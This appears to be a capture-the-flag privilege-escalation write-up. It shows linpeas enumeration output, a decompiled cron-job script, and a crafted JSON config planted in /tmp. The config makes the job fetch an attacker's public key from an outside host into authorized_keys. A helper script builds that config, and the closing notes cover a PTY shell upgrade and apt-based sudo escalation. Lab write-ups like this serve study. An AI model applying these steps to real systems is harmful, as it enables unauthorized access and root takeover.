drwxr-xr-x 3 root root 4096 May 10 2020 /usr/lib/python2.7/dist-packages/keyrings
drwxr-xr-x 3 root root 4096 May 10 2020 /usr/lib/python3/dist-packages/keyrings
drwxr-xr-x 2 root root 4096 May 6 2020 /usr/share/keyrings
╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
gpg Not Found
netpgpkeys Not Found
netpgp Not Found
-rw-r--r-- 1 root root 2796 Sep 18 2018 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
-rw-r--r-- 1 root root 2794 Sep 18 2018 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
-rw-r--r-- 1 root root 1733 Sep 18 2018 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
-rw-r--r-- 1 root root 3267 Jan 10 2019 /usr/share/gnupg/distsigkey.gpg
-rw-r--r-- 1 root root 7399 Sep 18 2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27 2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb 6 2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17 2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 2253 Mar 21 2018 /usr/share/keyrings/ubuntu-esm-keyring.gpg
-rw-r--r-- 1 root root 1139 Mar 21 2018 /usr/share/keyrings/ubuntu-fips-keyring.gpg
-rw-r--r-- 1 root root 1139 Mar 21 2018 /usr/share/keyrings/ubuntu-fips-updates-keyring.gpg
-rw-r--r-- 1 root root 1227 May 27 2010 /usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 2867 Feb 22 2018 /usr/share/popularity-contest/debian-popcon.gpg
╔══════════╣ Kubernetes information
╔══════════╣ Analyzing Bind Files (limit 70)
-rw-r--r-- 1 root root 856 Apr 2 2018 /usr/share/bash-completion/completions/bind
╔══════════╣ Analyzing Interesting logs Files (limit 70)
-rw-r--r-- 1 www-data www-data 49 Feb 15 17:22 /var/log/lighttpd/error.log
╔══════════╣ Analyzing Other Interesting Files Files (limit 70)
-rw-r--r-- 1 root root 3771 Apr 5 2018 /etc/skel/.bashrc
-rw-r--r-- 1 root root 807 Apr 5 2018 /etc/skel/.profile
╔═══════════════════╗
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid>
-rwsr-xr-x 1 root root 44K Mar 23 2019 /bin/su
-rwsr-xr-x 1 root root 27K Mar 5 2020 /bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 43K Mar 5 2020 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 31K Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 63K Jun 28 2019 /bin/ping
-rwsr-xr-x 1 root root 75K Mar 23 2019 /usr/bin/gpasswd
-rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 75K Mar 23 2019 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 23 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 146K Jan 31 2020 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 19K Jun 28 2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 59K Mar 23 2019 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 22K Mar 27 2019 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 37K Mar 23 2019 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 37K Mar 23 2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 40K Mar 23 2019 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 427K Mar 4 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 99K Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-sr-x 1 root root 107K Oct 30 2019 /usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 14K Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-- 1 root messagebus 42K Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
╔══════════╣ SGID
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid>
-rwxr-sr-x 1 root crontab 39K Nov 16 2017 /usr/bin/crontab
-rwxr-sr-x 1 root ssh 355K Mar 4 2019 /usr/bin/ssh-agent
-rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwxr-sr-x 1 root shadow 23K Mar 23 2019 /usr/bin/expiry
-rwxr-sr-x 1 root shadow 71K Mar 23 2019 /usr/bin/chage
-rwxr-sr-x 1 root tty 14K Jan 17 2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root mlocate 43K Mar 1 2018 /usr/bin/mlocate
-rwxr-sr-x 1 root tty 31K Mar 5 2020 /usr/bin/wall
-rwxr-sr-x 1 root utmp 10K Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwsr-sr-x 1 root root 107K Oct 30 2019 /usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwxr-sr-x 1 root shadow 34K Feb 27 2019 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34K Feb 27 2019 /sbin/unix_chkpwd
╔══════════╣ Checking misconfigurations of ld.so
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so>
/etc/ld.so.conf
include /etc/ld.so.conf.d/*.conf
/etc/ld.so.conf.d
/etc/ld.so.conf.d/fakeroot-x86_64-linux-gnu.conf
/usr/lib/x86_64-linux-gnu/libfakeroot
/etc/ld.so.conf.d/libc.conf
/usr/local/lib
/etc/ld.so.conf.d/x86_64-linux-gnu.conf
/usr/local/lib/x86_64-linux-gnu
/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu
╔══════════╣ Capabilities
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities>
Current capabilities:
Current: =
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
Shell capabilities:
0x0000000000000000=
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
Files with capabilities (limited to 50):
/usr/bin/mtr-packet = cap_net_raw+ep
╔══════════╣ Users with capabilities
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities>
╔══════════╣ Files with ACLs (limited to 50)
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls>
files with acls in searched folders Not Found
╔══════════╣ .sh files in path
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path>
/usr/bin/gettext.sh
╔══════════╣ Unexpected in root
/vmlinuz
/initrd.img.old
/initrd.img
/vmlinuz.old
/swapfile
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files>
total 28
drwxr-xr-x 2 root root 4096 May 6 2020 .
drwxr-xr-x 94 root root 4096 Sep 30 2020 ..
-rw-r--r-- 1 root root 96 Sep 27 2019 01-locale-fix.sh
-rw-r--r-- 1 root root 1557 Dec 4 2017 Z97-byobu.sh
-rw-r--r-- 1 root root 825 Oct 30 2019 apps-bin-path.sh
-rw-r--r-- 1 root root 664 Apr 2 2018 bash_completion.sh
-rw-r--r-- 1 root root 1003 Dec 29 2015 cedilla-portuguese.sh
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d>
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/root/
╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
/opt/.tick-serv
/opt/.web/static/css
╔══════════╣ Readable files belonging to root and readable by me but not world readable
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/auth.log
/var/log/journal/71d425fbe76e481183a186a4c87ab689/system.journal
/var/log/syslog
╔══════════╣ Writable log files (logrotten) (limit 100)
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation>
Writable: /var/log/lighttpd/error.log
╔══════════╣ Files inside /home/www-data (limit 20)
╔══════════╣ Files inside others home (limit 20)
╔══════════╣ Searching installed mail applications
╔══════════╣ Mails (limit 50)
╔══════════╣ Backup folders
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 7857 May 11 2020 /lib/modules/4.15.0-101-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 7905 May 11 2020 /lib/modules/4.15.0-101-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 7857 Apr 23 2020 /lib/modules/4.15.0-99-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 7905 Apr 23 2020 /lib/modules/4.15.0-99-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 7838 Apr 24 2018 /lib/modules/4.15.0-20-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 7886 Apr 24 2018 /lib/modules/4.15.0-20-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 35544 Mar 25 2020 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rw-r--r-- 1 root root 217469 Apr 23 2020 /usr/src/linux-headers-4.15.0-99-generic/.config.old
-rw-r--r-- 1 root root 0 Apr 23 2020 /usr/src/linux-headers-4.15.0-99-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 Apr 23 2020 /usr/src/linux-headers-4.15.0-99-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 216818 Apr 24 2018 /usr/src/linux-headers-4.15.0-20-generic/.config.old
-rw-r--r-- 1 root root 0 Apr 24 2018 /usr/src/linux-headers-4.15.0-20-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 Apr 24 2018 /usr/src/linux-headers-4.15.0-20-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 217460 May 11 2020 /usr/src/linux-headers-4.15.0-101-generic/.config.old
-rw-r--r-- 1 root root 0 May 11 2020 /usr/src/linux-headers-4.15.0-101-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 May 11 2020 /usr/src/linux-headers-4.15.0-101-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 2746 Jan 23 2020 /usr/share/man/man8/vgcfgbackup.8.gz
-rw-r--r-- 1 root root 7867 Nov 7 2016 /usr/share/doc/telnet/README.telnet.old.gz
-rw-r--r-- 1 root root 361345 Feb 2 2018 /usr/share/doc/manpages/Changes.old.gz
-rwxr-xr-x 1 root root 226 Dec 4 2017 /usr/share/byobu/desktop/byobu.desktop.old
-rw-r--r-- 1 root root 11755 May 6 2020 /usr/share/info/dir.old
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found: /var/lib/mlocate/mlocate.db: regular file, no read permission
╔══════════╣ Web files?(output limit)
/var/www/:
total 20K
drwxr-xr-x 4 root root 4.0K Sep 30 2020 .
drwxr-xr-x 14 root root 4.0K May 7 2020 ..
drwxr-xr-x 2 root root 4.0K Jun 25 2019 cgi-bin
drwxr-xr-x 3 root root 4.0K May 19 2020 html
-rw-r--r-- 1 www-data www-data 33 Apr 21 14:33 local.txt
/var/www/cgi-bin:
total 8.0K
╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rwxr-xr-x 1 saint saint 1403 Jun 4 2020 /opt/.configuration.cpython-38.pyc
-rw-r--r-- 1 landscape landscape 0 May 6 2020 /var/lib/landscape/.cleanup.user
-rw------- 1 root root 0 Apr 26 2018 /etc/.pwd.lock
-rw-r--r-- 1 root root 220 Apr 5 2018 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 1531 May 6 2020 /etc/apparmor.d/cache/.features
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rwxrwxrwx 1 www-data www-data 152 Apr 21 15:34 /tmp/x.elf
-rwxrwxrwx 1 www-data www-data 763810 Apr 21 15:41 /tmp/linpeas.sh
-rw-r--r-- 1 root root 437 May 6 2020 /var/backups/dpkg.diversions.0
-rw-r--r-- 1 root root 8226 Jun 1 2020 /var/backups/apt.extended_states.0
-rw-r--r-- 1 root root 51200 Jul 7 2020 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 360 May 7 2020 /var/backups/apt.extended_states.3.gz
-rw-r--r-- 1 root root 884 May 16 2020 /var/backups/apt.extended_states.1.gz
-rw-r--r-- 1 root root 135 May 6 2020 /var/backups/dpkg.statoverride.0
-rw-r--r-- 1 root root 878 May 10 2020 /var/backups/apt.extended_states.2.gz
-rw-r--r-- 1 root root 593270 Jun 4 2020 /var/backups/dpkg.status.0
-rw-r--r-- 1 root root 11 May 5 2020 /var/backups/dpkg.arch.0
-rw-r--r-- 1 root root 342 May 6 2020 /var/backups/apt.extended_states.4.gz
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files>
/dev/mqueue
/dev/shm
/opt/.tick-serv
/opt/.tick-serv/tickets.sh
/opt/.web
/opt/.web/data.json
/opt/.web/static
/opt/.web/static/css
/opt/.web/static/css/css.css
/opt/.web/static/img
/opt/.web/templates
/opt/.web/templates/index.html
/opt/.web/webapp.py
/run/lighttpd
/run/lock
/run/screen
/tmp
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/tmp/.font-unix
#)You_can_write_even_more_files_inside_last_directory
/var/cache/lighttpd/compress
/var/cache/lighttpd/compress/css.css-gzip-393266-2262-1156926736
/var/cache/lighttpd/compress/highway
/var/cache/lighttpd/compress/index.html-gzip-413113-1414-1589899601
/var/cache/lighttpd/uploads
/var/crash
/var/lib/lxcfs/cgroup/memory/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/atd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cron.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dbus.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lighttpd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxd.socket/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/networkd-dispatcher.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/open-vm-tools.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/polkit.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/snapd.socket/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ssh.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/swapfile.swap/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-config.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-networkd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-resolved.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/unattended-upgrades.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/vgauth.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/web.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/xinetd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/user.slice/cgroup.event_control
/var/log/lighttpd
/var/log/lighttpd/error.log
/var/tmp
/var/www/local.txt
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files>
Group www-data:
/tmp/x.elf
/tmp/linpeas.sh
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/bin/systemd-ask-password
/bin/systemd-tty-ask-password-agent
/etc/pam.d/common-password
/usr/lib/git-core/git-credential
/usr/lib/git-core/git-credential-cache
/usr/lib/git-core/git-credential-cache--daemon
/usr/lib/git-core/git-credential-store
#)There are more creds/passwds files in the previous parent folder
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/python2.7/dist-packages/keyring/credentials.py
/usr/lib/python2.7/dist-packages/keyring/credentials.pyc
/usr/lib/python3/dist-packages/keyring/__pycache__/credentials.cpython-36.pyc
/usr/lib/python3/dist-packages/keyring/credentials.py
/usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-36.pyc
/usr/lib/python3/dist-packages/twisted/cred/credentials.py
/usr/share/dns/root.key
/usr/share/doc/git/contrib/credential
/usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c
/usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c
/usr/share/doc/git/contrib/credential/netrc/git-credential-netrc
/usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c
/usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c
/usr/share/man/man1/git-credential-cache--daemon.1.gz
/usr/share/man/man1/git-credential-cache.1.gz
/usr/share/man/man1/git-credential-store.1.gz
/usr/share/man/man1/git-credential.1.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/man/man7/gitcredentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/pam/common-password.md5sums
/usr/share/ubuntu-advantage-tools/modules/credentials.sh
/var/cache/debconf/passwords.dat
/var/lib/pam/password
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
╔══════════╣ Searching passwords inside logs (limit 70)
python3 -c 'import pty; pty.spawn("/bin/bash")' to upgrade the shell to a TTY.
Download the pyc file (the linpeas output above lists /opt/.configuration.cpython-38.pyc) and decompile it:
<https://tool.lu/pyc/>
#!/usr/bin/env python
# visit <https://tool.lu/pyc/> for more information
from configuration import *
from connectors.ftpconn import *
from connectors.sshconn import *
from connectors.utils import *
def main():
    '''Main function
    Cron job is going to make my work easy peasy
    '''
    configPath = ConfigReader.set_config_path()
    config = ConfigReader.read_config(configPath)
    connections = checker(config)
    if 'FTP' in connections:
        ftpcon(config['FTP'])
    elif 'SSH' in connections:
        sshcon(config['SSH'])
    elif 'URL' in connections:
        # fetches config['URL'] and writes it to config['Output']: the branch abused below
        sync(config['URL'], config['Output'])
if __name__ == '__main__':
    main()
// the configuration module (ConfigReader), decompiled
#!/usr/bin/env python
# visit <https://tool.lu/pyc/> for more information
import os
import sys
import json
from glob import glob
from datetime import datetime as dt
class ConfigReader:
    config = None
    def read_config(path):
        '''Reads the config file
        '''
        config_values = { }
        # WARNING: Decompyle incomplete
    read_config = staticmethod(read_config)
    def set_config_path():
        '''Set the config path
        '''
        # /tmp is world-writable, so an attacker-controlled file lands in this list
        files = glob('/home/saint/*.json')
        other_files = glob('/tmp/*.json')
        files = files + other_files
        try:
            # only the first two matches are ever compared; /tmp entries come last
            if len(files) > 2:
                files = files[:2]
            file1 = os.path.basename(files[0]).split('.')
            file2 = os.path.basename(files[1]).split('.')
            # expected name: DD-MM-YYYY.config.json; the newer date wins
            if file1[-2] == 'config' and file2[-2] == 'config':
                a = dt.strptime(file1[0], '%d-%m-%Y')
                b = dt.strptime(file2[0], '%d-%m-%Y')
                if b < a:
                    filename = files[0]
                else:
                    filename = files[1]
        except Exception:
            # fewer than two files, or a name that does not parse: the job exits
            sys.exit(1)
        return filename
    set_config_path = staticmethod(set_config_path)
// the config file
Create a file named 21-04-2022.config.json in /tmp (the job globs that directory too, and the linpeas output shows it is world-writable). The date in the name must parse as %d-%m-%Y and be newer than the one already in /home/saint, because set_config_path() keeps the newer of the first two matches. The URL key is what the job fetches and the Output key is where it writes the result:
{
    "URL": "http://192.168.49.114/id_rsa.pub",
    "Output": "/home/saint/.ssh/authorized_keys"
}
Then wait for the job to fetch the public key and ssh in as saint without a password.
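To check a candidate filename before dropping it into /tmp, here is an added example (my own code, not the box's cron job or the decompiled module) that re-implements the selection rule of set_config_path() as a pure function over a constructed directory listing and builds the config body. The single 01-06-2020 file assumed to already exist in /home/saint, the second home file in the last call, and the attacker URL are assumptions; the URL/Output keys, the DD-MM-YYYY.config.json naming and the "first two matches, newer date wins" rule come from the decompiled code above.

```python
#!/usr/bin/env python3
"""Offline model of the cron job's config-file selection (added example, not the box's code)."""
import json
import os
from datetime import datetime as dt

# Assumed attacker values (only the filename and the two JSON keys come from the writeup).
ATTACKER_URL = "http://192.168.49.114/id_rsa.pub"
TARGET_OUTPUT = "/home/saint/.ssh/authorized_keys"


def pick_config(home_json, tmp_json):
    """Mirror of ConfigReader.set_config_path().

    home_json stands in for glob('/home/saint/*.json'), tmp_json for glob('/tmp/*.json'),
    each in glob order. Returns the path the job would read, or None wherever the
    original calls sys.exit(1) or would hit an unbound `filename`.
    """
    files = list(home_json) + list(tmp_json)
    if len(files) > 2:
        files = files[:2]          # only the first two candidates are ever considered
    try:
        file1 = os.path.basename(files[0]).split(".")   # IndexError with < 2 files
        file2 = os.path.basename(files[1]).split(".")
        if file1[-2] == "config" and file2[-2] == "config":
            a = dt.strptime(file1[0], "%d-%m-%Y")       # ValueError on a bad date
            b = dt.strptime(file2[0], "%d-%m-%Y")
            return files[0] if b < a else files[1]      # newer date wins; tie -> files[1]
        return None   # original: `filename` never assigned, NameError at return
    except Exception:
        return None   # original: sys.exit(1)


def craft_config(date_str, url=ATTACKER_URL, output=TARGET_OUTPUT):
    """Return (filename, body) in the DD-MM-YYYY.config.json shape the job expects,
    with the URL and Output keys consumed by sync(config['URL'], config['Output'])."""
    dt.strptime(date_str, "%d-%m-%Y")   # fail early on a name the job could not parse
    body = {"URL": url, "Output": output}
    return f"{date_str}.config.json", json.dumps(body, indent=4)


if __name__ == "__main__":
    # Constructed listing: one legitimate file in saint's home, ours in /tmp.
    home = ["/home/saint/01-06-2020.config.json"]
    name, body = craft_config("21-04-2022")
    print("winner:", pick_config(home, ["/tmp/" + name]))
    # Caveat: a second file in the home dir pushes /tmp out of the first two slots.
    print("winner:", pick_config(home + ["/home/saint/02-06-2020.config.json"], ["/tmp/" + name]))
    print(body)
```

The last call shows the failure mode to check for first: the job truncates to the first two glob matches and the /home/saint entries come first, so if saint already has two .json files the /tmp file is never considered, however new its date.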
I got burned here and ended up resetting the box; it turned out I had been misled by this. Only after reading sudoers carefully did I realize the problem: it needs root-group permissions.
So I created a user in the root group, read sudoers, and found that only jason is needed and that jason can run the apt command. Any sudo rule that allows apt is effectively root, since apt can execute arbitrary commands (for example through the APT::Update::Pre-Invoke option); a search turned up this:
<https://www.freebuf.com/articles/system/261271.html>